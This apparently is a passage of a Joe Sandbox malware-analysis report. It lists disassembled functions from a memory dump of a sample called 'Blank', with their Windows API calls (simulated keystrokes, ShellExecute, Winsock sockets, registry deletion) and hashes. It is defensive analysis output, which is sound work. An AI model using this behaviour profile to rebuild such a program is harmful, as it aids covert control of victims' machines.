                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1771278535867bf3687be9048d5c94414fc54888a8d1f6fd359a5a67d41f0676
                                                                                                                                    • Instruction ID: eaadf88ab305dfcff004febab5ca4bbafa485ec6cda4e9db502e78babc5d3617
                                                                                                                                    • Opcode Fuzzy Hash: 1771278535867bf3687be9048d5c94414fc54888a8d1f6fd359a5a67d41f0676
                                                                                                                                    • Instruction Fuzzy Hash: EA715D34910109EFDB058F58CC89EBEBB79FF85315F188159F915AB251C730AAA1DFA0
                                                                                                                                    Function 002EB9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • IsWindow.USER32(?), ref: 002EBA5D
                                                                                                                                    • IsWindowEnabled.USER32(?), ref: 002EBA69
                                                                                                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 002EBB4D
                                                                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002EBB84
                                                                                                                                    • IsDlgButtonChecked.USER32(?,?), ref: 002EBBC1
                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 002EBBE3
                                                                                                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002EBBFB
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4072528602-0
                                                                                                                                    • Opcode ID: 070bd6b5d7f1c0e2fa6ecc308bfca2ad75b7a3a8e7f9a1e37fc4a4174489e00b
                                                                                                                                    • Instruction ID: bd5c25da3b27fee1c95f6a1da33fbabc1eb81d2360b20f042fce37c3bb29257b
                                                                                                                                    • Opcode Fuzzy Hash: 070bd6b5d7f1c0e2fa6ecc308bfca2ad75b7a3a8e7f9a1e37fc4a4174489e00b
                                                                                                                                    • Instruction Fuzzy Hash: AD71B034A94286AFDF229F56D8D8FBB77A9FF09310F940069E94597351C731AC60CB50
                                                                                                                                    Function 002DFB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002DFB31
                                                                                                                                    • _memset.LIBCMT ref: 002DFBFA
                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 002DFC3F
                                                                                                                                      • Part of subcall function 00264D37: __itow.LIBCMT ref: 00264D62
                                                                                                                                      • Part of subcall function 00264D37: __swprintf.LIBCMT ref: 00264DAC
                                                                                                                                      • Part of subcall function 0027436A: _wcscpy.LIBCMT ref: 0027438D
                                                                                                                                    • GetProcessId.KERNEL32(00000000), ref: 002DFCB6
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002DFCE5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 3522835683-2766056989
                                                                                                                                    • Opcode ID: 5e045333917462c84e530510f2fe99f45e5e4b7b5cd793dc35319ba8ef6a8b4b
                                                                                                                                    • Instruction ID: b06ab5197601071bef34d656ffae8b1adcfc6ab60172f82a8bb0fd8ecc69fc15
                                                                                                                                    • Opcode Fuzzy Hash: 5e045333917462c84e530510f2fe99f45e5e4b7b5cd793dc35319ba8ef6a8b4b
                                                                                                                                    • Instruction Fuzzy Hash: 5A61E375A20619DFCB11EF94C990AADB7F4FF48314F10846AE84AAB351CB30AD61CF94
                                                                                                                                    Function 0026AAAA Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002807BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 002807EC
                                                                                                                                      • Part of subcall function 002807BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 002807F4
                                                                                                                                      • Part of subcall function 002807BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 002807FF
                                                                                                                                      • Part of subcall function 002807BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0028080A
                                                                                                                                      • Part of subcall function 002807BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00280812
                                                                                                                                      • Part of subcall function 002807BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0028081A
                                                                                                                                      • Part of subcall function 0027FF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0026AC6B), ref: 0027FFA7
                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0026AD08
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0026AD85
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002A2F56
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                    • String ID: <w2$\t2$s2
                                                                                                                                    • API String ID: 1986988660-96398653
                                                                                                                                    • Opcode ID: 94215c4a6d2d44ba0d1c17820f92014bd6ecbfcc24f1a877ac5ac3f838c7cb9b
                                                                                                                                    • Instruction ID: 307bd3c9d94322c01524e348315508e37eb29f9f8b419c421ba62bda27283876
                                                                                                                                    • Opcode Fuzzy Hash: 94215c4a6d2d44ba0d1c17820f92014bd6ecbfcc24f1a877ac5ac3f838c7cb9b
                                                                                                                                    • Instruction Fuzzy Hash: 4E81DAB492A2408FC3A6EF3EAD966657FECFB59304B10816ED508C7272EB301516CF91
                                                                                                                                    Function 002C174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32(?), ref: 002C178B
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 002C17A0
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 002C1801
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 002C182F
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 002C184E
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 002C1894
                                                                                                                                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 002C18B7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                    • Opcode ID: 5bf27927e3cffb2eab00c62bbef4122f0ca6d9c01e2ac8ffe4bf6d4f3a1bf98f
                                                                                                                                    • Instruction ID: 6ed9649e316bdb67e8ae0b87423698d10efdbc82fb8f7768f2a549e929713402
                                                                                                                                    • Opcode Fuzzy Hash: 5bf27927e3cffb2eab00c62bbef4122f0ca6d9c01e2ac8ffe4bf6d4f3a1bf98f
                                                                                                                                    • Instruction Fuzzy Hash: D651B3A09287D63DFB368A248C56FB6BEE95F07300F08478DE0D9468D3C3A598B8D750
                                                                                                                                    Function 002C1565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetParent.USER32(00000000), ref: 002C15A4
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 002C15B9
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 002C161A
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002C1646
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002C1663
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002C16A7
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002C16C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 87235514-0
                                                                                                                                    • Opcode ID: c32f590b5398360eafbfd28d73ee409981dc6f38cbcfd97bb004208980c9ca95
                                                                                                                                    • Instruction ID: 14e9f7e81b9139627a40242ef0df3641e0dae442b7cbe41be253c003dc2e8fce
                                                                                                                                    • Opcode Fuzzy Hash: c32f590b5398360eafbfd28d73ee409981dc6f38cbcfd97bb004208980c9ca95
                                                                                                                                    • Instruction Fuzzy Hash: A051F5A09647D23DFB328B248C56F7ABEA95B07300F1C468DE0D9464C3C695ECB9DB50
                                                                                                                                    Function 002C5BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcsncpy$LocalTime
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2945705084-0
                                                                                                                                    • Opcode ID: 462b76e74a80c7fcfe4f3797e6380f8c9333bcbf77ede723a6cea1e9f76fffcb
                                                                                                                                    • Instruction ID: c79a7fa7e6b172efee1c6eb8d54285dd437253f6cd10727d4863aad1ad11f288
                                                                                                                                    • Opcode Fuzzy Hash: 462b76e74a80c7fcfe4f3797e6380f8c9333bcbf77ede723a6cea1e9f76fffcb
                                                                                                                                    • Instruction Fuzzy Hash: C6417069C3162976CB11FBB48C46ACFB3B8DF04310F504956F909E3151E634E769CBA9
                                                                                                                                    Function 002C3B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002C4BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002C3B8A,?), ref: 002C4BE0
                                                                                                                                      • Part of subcall function 002C4BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002C3B8A,?), ref: 002C4BF9
                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 002C3BAA
                                                                                                                                    • _wcscmp.LIBCMT ref: 002C3BC6
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 002C3BDE
                                                                                                                                    • _wcscat.LIBCMT ref: 002C3C26
                                                                                                                                    • SHFileOperationW.SHELL32(?), ref: 002C3C92
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 1377345388-1173974218
                                                                                                                                    • Opcode ID: 15ff4c84fc128882e9e7f2a3eada846712b63b7c0904d64006a57d50d6e4a6c5
                                                                                                                                    • Instruction ID: 0addae582c28d56ba5b454ab5be8d6c3543b7defe2923bb09701854728f27dbc
                                                                                                                                    • Opcode Fuzzy Hash: 15ff4c84fc128882e9e7f2a3eada846712b63b7c0904d64006a57d50d6e4a6c5
                                                                                                                                    • Instruction Fuzzy Hash: 55416D715183459AC752EF64D485EDFB7E8AF88340F504A2EF489C3191EB34D798CB52
                                                                                                                                    Function 002E78B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 002E78CF
                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002E7976
                                                                                                                                    • IsMenu.USER32(?), ref: 002E798E
                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002E79D6
                                                                                                                                    • DrawMenuBar.USER32 ref: 002E79E9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 3866635326-4108050209
                                                                                                                                    • Opcode ID: 6304747a66fe1ffeedaa5783875b92d30f1da1fe4380c125f13fe45e1cd78a34
                                                                                                                                    • Instruction ID: 0b223ef92c66d5e16c86262ceb54e49476cd64b727764a6bd1d29c47a2075982
                                                                                                                                    • Opcode Fuzzy Hash: 6304747a66fe1ffeedaa5783875b92d30f1da1fe4380c125f13fe45e1cd78a34
                                                                                                                                    • Instruction Fuzzy Hash: F441AE74A14289EFDB20DF56E884EAABBF9FF05350F408129F94597251C770AD60CFA0
                                                                                                                                    Function 002E1602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 002E1631
                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002E165B
                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 002E1712
                                                                                                                                      • Part of subcall function 002E1602: RegCloseKey.ADVAPI32(?), ref: 002E1678
                                                                                                                                      • Part of subcall function 002E1602: FreeLibrary.KERNEL32(?), ref: 002E16CA
                                                                                                                                      • Part of subcall function 002E1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002E16ED
                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 002E16B5
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 395352322-0
                                                                                                                                    • Opcode ID: b3503b6f91b86c70d50ad1c94dd83109452ba31c6a3da71c5cee44f89df20dbd
                                                                                                                                    • Instruction ID: beb416fa63788460b9fb32415eb673623ec1f6e1a4e4604b7bd8bb6d6526b78d
                                                                                                                                    • Opcode Fuzzy Hash: b3503b6f91b86c70d50ad1c94dd83109452ba31c6a3da71c5cee44f89df20dbd
                                                                                                                                    • Instruction Fuzzy Hash: 2B315CB1950109BFEB149F91DC89EFFB7BCEF08350F400179E501A2151EB709EA59BA0
                                                                                                                                    Function 002E68F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 002E6911
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002E6944
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002E6979
                                                                                                                                    • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 002E69AB
                                                                                                                                    • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 002E69D5
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002E69E6
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002E6A00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LongWindow$MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2178440468-0
                                                                                                                                    • Opcode ID: 17f459f1411d1ccb1d397f19589468bf9e95de9a34781a52ce3723b656611268
                                                                                                                                    • Instruction ID: 8f4a0ce5f9a1a8e03d75984d8071f1efe73edb206ebff7bba1bb1395c0b1c3e0
                                                                                                                                    • Opcode Fuzzy Hash: 17f459f1411d1ccb1d397f19589468bf9e95de9a34781a52ce3723b656611268
                                                                                                                                    • Instruction Fuzzy Hash: DE3137316941929FDB21CF19EC89F6437E5FB593A0F5801A8F514CB2B2CB71AC60DB50
                                                                                                                                    Function 002BE287 Relevance: 10.6, APIs: 7, Instructions: 95COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002BE2CA
                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 002BE2F0
                                                                                                                                    • #2.WSOCK32(00000000), ref: 002BE2F3
                                                                                                                                    • #2.WSOCK32(?), ref: 002BE311
                                                                                                                                    • #6.OLEAUT32(?), ref: 002BE31A
                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 002BE33F
                                                                                                                                    • #2.WSOCK32(?), ref: 002BE34D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide$FromString
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1211328463-0
                                                                                                                                    • Opcode ID: 1eafa05082809b42cf9aa00a0d6b91b9dec9eb3ff52410dd491873909772c15e
                                                                                                                                    • Instruction ID: af4a343f3720ca7aad7de589cd343f1a09f99922fdba2a36a6210dc967eb9fa5
                                                                                                                                    • Opcode Fuzzy Hash: 1eafa05082809b42cf9aa00a0d6b91b9dec9eb3ff52410dd491873909772c15e
                                                                                                                                    • Instruction Fuzzy Hash: 26218376614219AF9F10DFA8DC88CFF77ECEB083A0B058165FA14DB251D670AC558760
                                                                                                                                    Function 002D685E Relevance: 10.6, APIs: 7, Instructions: 94COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 002D8475: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002D84A0
                                                                                                                                    • #23.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 002D68B1
                                                                                                                                    • #111.WSOCK32(00000000), ref: 002D68C0
                                                                                                                                    • #12.WSOCK32(00000000,8004667E,00000000), ref: 002D68F9
                                                                                                                                    • #4.WSOCK32(00000000,?,00000010), ref: 002D6902
                                                                                                                                    • #111.WSOCK32 ref: 002D690C
                                                                                                                                    • #3.WSOCK32(00000000), ref: 002D6935
                                                                                                                                    • #12.WSOCK32(00000000,8004667E,00000000), ref: 002D694E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
